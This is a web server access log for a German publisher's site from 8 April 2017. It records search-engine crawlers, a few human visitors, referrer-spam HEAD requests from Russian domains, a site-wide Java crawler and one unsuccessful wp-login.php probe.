207.46.13.96 - - [08/Apr/2017:03:19:21 +0200] "GET /jahrbuch/jahrbuch.jpg HTTP/1.1" 200 11282 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
185.154.13.6 - - [08/Apr/2017:03:19:21 +0200] "HEAD / HTTP/1.1" 200 - "https://taximoskvi.ru/aeroport-sheremetyevo.html" "Mozilla/7.0 (compatible; MSIE3.00; Windows 2005)"
178.159.43.212 - - [08/Apr/2017:03:22:16 +0200] "HEAD / HTTP/1.1" 200 - "https://anapa777.ru/rooms" "Mozilla/2.0 (compatible; MSIE2.00; Windows 2003)"
68.180.230.44 - - [08/Apr/2017:03:59:06 +0200] "GET /sonderthemen/oekt_extra3.pdf HTTP/1.1" 200 2109745 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.1.218.163 - - [08/Apr/2017:04:54:30 +0200] "HEAD / HTTP/1.1" 200 - "-" "Java/1.6.0_23"
194.87.238.17 - - [08/Apr/2017:05:13:40 +0200] "HEAD / HTTP/1.1" 200 - "https://nochuem.ru" "Mozilla/3.0 (compatible; MSIE7.00; Windows 2007)"
195.133.145.199 - - [08/Apr/2017:05:13:41 +0200] "HEAD / HTTP/1.1" 200 - "https://gantbpm.ru/7-navykov-kotorye-pomogut-naladit-effektivnyj-dialog-chast-1/" "Mozilla/7.0 (compatible; MSIE3.00; Windows 2007)"
195.133.48.150 - - [08/Apr/2017:05:13:41 +0200] "HEAD / HTTP/1.1" 200 - "http://babysmart.watch/shop/q90/q90-bl.html" "Mozilla/7.0 (compatible; MSIE5.00; Windows 2007)"
163.172.66.136 - - [08/Apr/2017:05:13:42 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
88.99.27.172 - - [08/Apr/2017:05:26:09 +0200] "GET /sonderthemen/oeaz2001.pdf HTTP/1.1" 200 4496626 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)"
180.76.15.149 - - [08/Apr/2017:05:26:44 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.15.163 - - [08/Apr/2017:05:27:09 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
216.244.66.226 - - [08/Apr/2017:05:32:22 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
216.244.66.226 - - [08/Apr/2017:05:36:20 +0200] "GET /impressum.html HTTP/1.1" 200 2808 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
193.124.131.168 - - [08/Apr/2017:05:39:03 +0200] "HEAD / HTTP/1.1" 200 - "http://www.\xd1\x81\xd1\x82\xd1\x80\xd0\xbe\xd0\xb9\xd0\xba\xd0\xb0.kz/catalog/" "Mozilla/2.0 (compatible; MSIE5.00; Windows 2008)"
51.255.65.28 - - [08/Apr/2017:05:41:12 +0200] "GET /jahrbuch/titelseiten/index.html HTTP/1.1" 200 6735 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
195.133.147.89 - - [08/Apr/2017:05:43:01 +0200] "HEAD / HTTP/1.1" 200 - "https://mskunion.ru/epoksidnye-poly" "Mozilla/7.0 (compatible; MSIE2.00; Windows 2007)"
195.133.147.74 - - [08/Apr/2017:05:45:38 +0200] "HEAD / HTTP/1.1" 200 - "http://www.rendstroy.ru/" "Mozilla/8.0 (compatible; MSIE6.00; Windows 2009)"
62.138.0.25 - - [08/Apr/2017:05:47:46 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:05:47:46 +0200] "GET /jahrbuch/titelseiten/1967.jpg HTTP/1.1" 200 10004 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
38.100.21.66 - - [08/Apr/2017:05:52:58 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:52:59 +0200] "GET /gotteslob/index.html HTTP/1.1" 200 2770 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:52:59 +0200] "GET /cds/index.html HTTP/1.1" 200 7987 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:52:59 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:52:59 +0200] "GET /cds/hymnos_akathistos.html HTTP/1.1" 200 11061 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:52:59 +0200] "GET /cds/ignatius.html HTTP/1.1" 200 6576 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:53:00 +0200] "GET /cds/rosarium.html HTTP/1.1" 200 6680 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:53:00 +0200] "GET /kontakt/index.html HTTP/1.1" 200 2896 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:53:00 +0200] "GET /jahrbuch/index.html HTTP/1.1" 200 3956 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:53:00 +0200] "GET /buecher/veroeffentlichungsliste.html HTTP/1.1" 200 129779 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
38.100.21.66 - - [08/Apr/2017:05:53:01 +0200] "GET /impressum.html HTTP/1.1" 200 2808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)"
68.180.230.44 - - [08/Apr/2017:05:59:15 +0200] "GET /buecher/rezensionen_psalmen.html HTTP/1.1" 200 6787 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
178.159.39.237 - - [08/Apr/2017:06:03:45 +0200] "HEAD / HTTP/1.1" 200 - "http://www.westcomp.ru/catalog/servernye_komplektuyushchie_raid_kontrollery_pamyat/nr_512mb_cashe_module_for_hp_smart_array_p410_p411_p212_462975_001/" "Mozilla/7.0 (compatible; MSIE3.00; Windows 2004)"
85.25.210.234 - - [08/Apr/2017:06:14:20 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
85.25.210.234 - - [08/Apr/2017:06:14:20 +0200] "GET /jahrbuch/titelseiten/1988.jpg HTTP/1.1" 200 11285 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
194.87.234.246 - - [08/Apr/2017:06:16:50 +0200] "HEAD / HTTP/1.1" 200 - "https://misslee.ru/trendy-sezona/" "Mozilla/3.0 (compatible; MSIE2.00; Windows 2006)"
195.133.147.6 - - [08/Apr/2017:06:26:20 +0200] "HEAD / HTTP/1.1" 200 - "https://seolife.kz/" "Mozilla/8.0 (compatible; MSIE5.00; Windows 2006)"
78.46.156.169 - - [08/Apr/2017:07:00:52 +0200] "GET /sonderthemen/oekz2003.pdf HTTP/1.1" 200 4017017 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19"
62.138.0.25 - - [08/Apr/2017:07:14:16 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:07:14:16 +0200] "GET /jahrbuch/titelseiten/1980.jpg HTTP/1.1" 200 9114 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:07:29:50 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:07:29:51 +0200] "GET /sonderthemen/oeaz2002.jpg HTTP/1.1" 200 21431 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
185.154.13.6 - - [08/Apr/2017:07:31:52 +0200] "HEAD / HTTP/1.1" 200 - "https://taximoskvi.ru/taxi-aeroport-domodovo.html" "Mozilla/7.0 (compatible; MSIE7.00; Windows 2002)"
178.159.43.212 - - [08/Apr/2017:07:31:54 +0200] "HEAD / HTTP/1.1" 200 - "https://anapa777.ru/faq/1641-sobaka" "Mozilla/7.0 (compatible; MSIE2.00; Windows 2007)"
77.220.213.173 - - [08/Apr/2017:07:32:00 +0200] "HEAD / HTTP/1.1" 200 - "http://taromir.ru/news/magija_vikingov/2017-01-17-522" "Mozilla/6.0 (compatible; MSIE2.00; Windows 2006)"
66.249.76.56 - - [08/Apr/2017:07:54:46 +0200] "GET /sonderthemen/sk2004_s01.pdf HTTP/1.1" 200 162742 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
68.180.230.44 - - [08/Apr/2017:08:03:22 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.180.230.44 - - [08/Apr/2017:08:03:22 +0200] "GET /buecher/rezensionen_engel.html HTTP/1.1" 200 6598 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
5.9.94.207 - - [08/Apr/2017:08:20:25 +0200] "GET /sonderthemen/oeaz2001.pdf HTTP/1.1" 200 4496626 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
194.87.238.17 - - [08/Apr/2017:08:40:48 +0200] "HEAD / HTTP/1.1" 200 - "https://www.nochuem.ru" "Mozilla/5.0 (compatible; MSIE7.00; Windows 2007)"
195.133.145.199 - - [08/Apr/2017:08:40:48 +0200] "HEAD / HTTP/1.1" 200 - "https://gantbpm.ru/proekty/grafik-proizvodstva-rabot/" "Mozilla/4.0 (compatible; MSIE4.00; Windows 2004)"
195.133.48.150 - - [08/Apr/2017:08:40:49 +0200] "HEAD / HTTP/1.1" 200 - "http://babysmart.watch" "Mozilla/7.0 (compatible; MSIE2.00; Windows 2009)"
40.77.169.101 - - [08/Apr/2017:08:42:33 +0200] "GET /cds/hymnos_akathistos.html HTTP/1.1" 200 11061 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
195.133.147.74 - - [08/Apr/2017:09:17:16 +0200] "HEAD / HTTP/1.1" 200 - "http://www.rendstroy.ru/TechInfo/" "Mozilla/8.0 (compatible; MSIE6.00; Windows 2008)"
195.133.147.89 - - [08/Apr/2017:09:17:16 +0200] "HEAD / HTTP/1.1" 200 - "https://mskunion.ru/" "Mozilla/4.0 (compatible; MSIE7.00; Windows 2005)"
193.124.131.168 - - [08/Apr/2017:09:17:29 +0200] "HEAD / HTTP/1.1" 200 - "http://www.\xd1\x81\xd1\x82\xd1\x80\xd0\xbe\xd0\xb9\xd0\xba\xd0\xb0.kz/catalog/" "Mozilla/2.0 (compatible; MSIE4.00; Windows 2008)"
180.76.15.25 - - [08/Apr/2017:09:23:15 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.15.24 - - [08/Apr/2017:09:23:31 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
62.138.0.25 - - [08/Apr/2017:10:00:53 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:10:00:53 +0200] "GET /sonderthemen/oekt_extra1.jpg HTTP/1.1" 200 12628 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
194.87.234.246 - - [08/Apr/2017:10:12:40 +0200] "HEAD / HTTP/1.1" 200 - "https://misslee.ru/trendy-sezona/" "Mozilla/3.0 (compatible; MSIE3.00; Windows 2006)"
120.63.10.242 - - [08/Apr/2017:10:13:50 +0200] "GET /wp-login.php HTTP/1.1" 404 2381 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
120.63.10.242 - - [08/Apr/2017:10:13:50 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
178.159.39.237 - - [08/Apr/2017:10:17:25 +0200] "HEAD / HTTP/1.1" 200 - "http://www.westcomp.ru/catalog/servernye_komplektuyushchie_ethernet_fs_adaptery_fibre_channel/adapter_hp_pci_x_133mhz_storageworks_lp1050_2gb_s_64bit_hba_single_port_fc_366027_001_a7388a/" "Mozilla/6.0 (compatible; MSIE6.00; Windows 2004)"
195.133.147.6 - - [08/Apr/2017:10:27:05 +0200] "HEAD / HTTP/1.1" 200 - "https://seolife.kz/" "Mozilla/2.0 (compatible; MSIE3.00; Windows 2007)"
62.138.0.25 - - [08/Apr/2017:10:27:13 +0200] "GET /sonderthemen/sk2004.jpg HTTP/1.1" 200 8855 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
207.46.13.58 - - [08/Apr/2017:10:36:49 +0200] "GET /buecher/rezensionen_krise_zum_heil.html HTTP/1.1" 200 9828 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
87.210.17.86 - - [08/Apr/2017:10:41:55 +0200] "GET / HTTP/1.1" 200 9360 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:55 +0200] "GET /impressum.html HTTP/1.1" 200 2808 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:56 +0200] "GET /search.php HTTP/1.1" 200 2027 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:56 +0200] "GET /index.html HTTP/1.1" 200 9360 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:56 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:57 +0200] "GET /buecher/rezensionen_chateaubriand.html HTTP/1.1" 200 47317 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:57 +0200] "GET /buecher/veroeffentlichungsliste.html HTTP/1.1" 200 129779 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:58 +0200] "GET /cds/hymnos_akathistos.html HTTP/1.1" 200 11061 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:58 +0200] "GET /cds/ignatius.html HTTP/1.1" 200 6576 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:59 +0200] "GET /cds/index.html HTTP/1.1" 200 7987 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:59 +0200] "GET /cds/rosarium.html HTTP/1.1" 200 6680 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:41:59 +0200] "GET /gotteslob/index.html HTTP/1.1" 200 2770 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:00 +0200] "GET /jahrbuch/index.html HTTP/1.1" 200 3956 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:00 +0200] "GET /kontakt/index.html HTTP/1.1" 200 2896 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:00 +0200] "GET /sonderthemen/index.html HTTP/1.1" 200 7102 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:00 +0200] "GET /buecher/bestellung.php HTTP/1.1" 200 10142 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:01 +0200] "GET /buecher/diskussion.html HTTP/1.1" 200 9925 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:02 +0200] "GET /buecher/rezensionen_engel.html HTTP/1.1" 200 6598 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:02 +0200] "GET /buecher/rezensionen_krise_zum_heil.html HTTP/1.1" 200 9828 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:02 +0200] "GET /buecher/rezensionen_le_saulchoir.html HTTP/1.1" 200 34009 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:03 +0200] "GET /buecher/rezensionen_leiblichkeit_und_zeitlichkeit.html HTTP/1.1" 200 8821 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:03 +0200] "GET /buecher/rezensionen_nicht_auf_sand_gebaut.html HTTP/1.1" 200 6594 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:03 +0200] "GET /buecher/rezensionen_preysing.html HTTP/1.1" 200 9502 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:04 +0200] "GET /buecher/rezensionen_psalmen.html HTTP/1.1" 200 6787 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:04 +0200] "GET /contentflow/contentflow.js HTTP/1.1" 200 42064 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:04 +0200] "GET /buecher/rezensionen.html HTTP/1.1" 200 6964 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:05 +0200] "GET /buecher/rezensionen_ignatius.html HTTP/1.1" 200 8182 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:05 +0200] "GET /cds/astazi.html HTTP/1.1" 200 8453 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:05 +0200] "GET /cds/glockenspiel1.html HTTP/1.1" 200 9736 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:06 +0200] "GET /cds/glockenspiel2.html HTTP/1.1" 200 9831 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:06 +0200] "GET /cds/lumina.html HTTP/1.1" 200 9000 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:07 +0200] "GET /jahrbuch/bestellung.php HTTP/1.1" 200 10316 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:07 +0200] "GET /sonderthemen/archiv.html HTTP/1.1" 200 6959 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:08 +0200] "GET /sonderthemen/presse.html HTTP/1.1" 200 5772 "-" "Java/1.6.0_04"
87.210.17.86 - - [08/Apr/2017:10:42:08 +0200] "GET /contentflow/\"+K.src+\" HTTP/1.1" 404 2381 "-" "Java/1.6.0_04"
62.138.0.25 - - [08/Apr/2017:11:46:37 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:11:46:37 +0200] "GET /sonderthemen/oekt_extra3.jpg HTTP/1.1" 200 12585 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
185.154.13.6 - - [08/Apr/2017:11:46:47 +0200] "HEAD / HTTP/1.1" 200 - "https://taximoskvi.ru/about.html" "Mozilla/4.0 (compatible; MSIE5.00; Windows 2009)"
178.159.43.212 - - [08/Apr/2017:11:49:56 +0200] "HEAD / HTTP/1.1" 200 - "https://anapa777.ru/faq/1640-nosilshchiki" "Mozilla/6.0 (compatible; MSIE5.00; Windows 2009)"
78.46.156.169 - - [08/Apr/2017:11:53:36 +0200] "GET /buecher/rezension_gesichter_u_geschichten.pdf HTTP/1.1" 200 223287 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"
188.103.174.121 - - [08/Apr/2017:11:55:50 +0200] "GET /buecher/veroeffentlichungsliste.html HTTP/1.1" 200 129779 "https://www.google.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:11:55:51 +0200] "GET /main.css HTTP/1.1" 200 1439 "http://www.morusverlag.de/buecher/veroeffentlichungsliste.html" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:11:55:51 +0200] "GET /logo_g.gif HTTP/1.1" 200 1301 "http://www.morusverlag.de/buecher/veroeffentlichungsliste.html" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:11:55:51 +0200] "GET /mv_g.gif HTTP/1.1" 200 4070 "http://www.morusverlag.de/buecher/veroeffentlichungsliste.html" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:11:55:51 +0200] "GET /pf.gif HTTP/1.1" 200 62 "http://www.morusverlag.de/buecher/veroeffentlichungsliste.html" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:11:55:52 +0200] "GET /strich.gif HTTP/1.1" 200 45 "http://www.morusverlag.de/buecher/veroeffentlichungsliste.html" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:11:55:54 +0200] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:06 +0200] "GET / HTTP/1.1" 200 9360 "https://www.google.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /mv_gr_w.gif HTTP/1.1" 200 2005 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /jahrbuch_k.jpg HTTP/1.1" 200 3719 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /buecher/gesichter.jpg HTTP/1.1" 200 7271 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /cds/rosarium_k.jpg HTTP/1.1" 200 3972 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /cds/ignatius_k.jpg HTTP/1.1" 200 3965 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /cds/hymnos_k.jpg HTTP/1.1" 200 4986 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /cds/astazi_k.jpg HTTP/1.1" 200 6049 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /gotteslob.jpg HTTP/1.1" 200 9390 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /buecher/engel.jpg HTTP/1.1" 200 5414 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /buecher/chateaubriand.jpg HTTP/1.1" 200 2272 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
188.103.174.121 - - [08/Apr/2017:12:00:07 +0200] "GET /buch_k.jpg HTTP/1.1" 200 4591 "http://www.morusverlag.de/" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
5.9.106.81 - - [08/Apr/2017:12:20:23 +0200] "GET /sonderthemen/oeaz2002.pdf HTTP/1.1" 200 3161455 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0"
5.9.106.81 - - [08/Apr/2017:12:20:38 +0200] "GET /sonderthemen/oeaz2002.pdf HTTP/1.1" 200 3161455 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Safari/537.22"
68.180.230.44 - - [08/Apr/2017:12:24:57 +0200] "GET /sonderthemen/sk2004_s01.pdf HTTP/1.1" 200 162742 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.138.0.25 - - [08/Apr/2017:12:35:07 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:12:35:07 +0200] "GET /jahrbuch/titelseiten/1983.jpg HTTP/1.1" 200 11695 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
157.55.39.86 - - [08/Apr/2017:12:40:13 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
68.180.230.44 - - [08/Apr/2017:12:43:58 +0200] "GET /buecher/rezensionen_chateaubriand.html HTTP/1.1" 200 47317 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
40.77.167.88 - - [08/Apr/2017:13:07:22 +0200] "GET /cds/hymnos_akathistos.html HTTP/1.1" 200 11061 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.88 - - [08/Apr/2017:13:07:25 +0200] "GET /jahrbuch/bestellung.php HTTP/1.1" 200 10316 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
180.76.15.27 - - [08/Apr/2017:13:24:23 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.15.17 - - [08/Apr/2017:13:24:42 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
46.21.227.115 - - [08/Apr/2017:14:53:04 +0200] "GET / HTTP/1.0" 200 9360 "-" "-"
85.25.210.41 - - [08/Apr/2017:14:53:37 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
85.25.210.41 - - [08/Apr/2017:14:53:37 +0200] "GET /sonderthemen/az2000.jpg HTTP/1.1" 200 13932 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:15:26:14 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:15:26:14 +0200] "GET /jahrbuch/titelseiten/1999.jpg HTTP/1.1" 200 10450 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
40.77.167.88 - - [08/Apr/2017:15:26:38 +0200] "GET /jahrbuch/bestellung.php HTTP/1.1" 200 10316 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
40.77.167.88 - - [08/Apr/2017:15:26:39 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
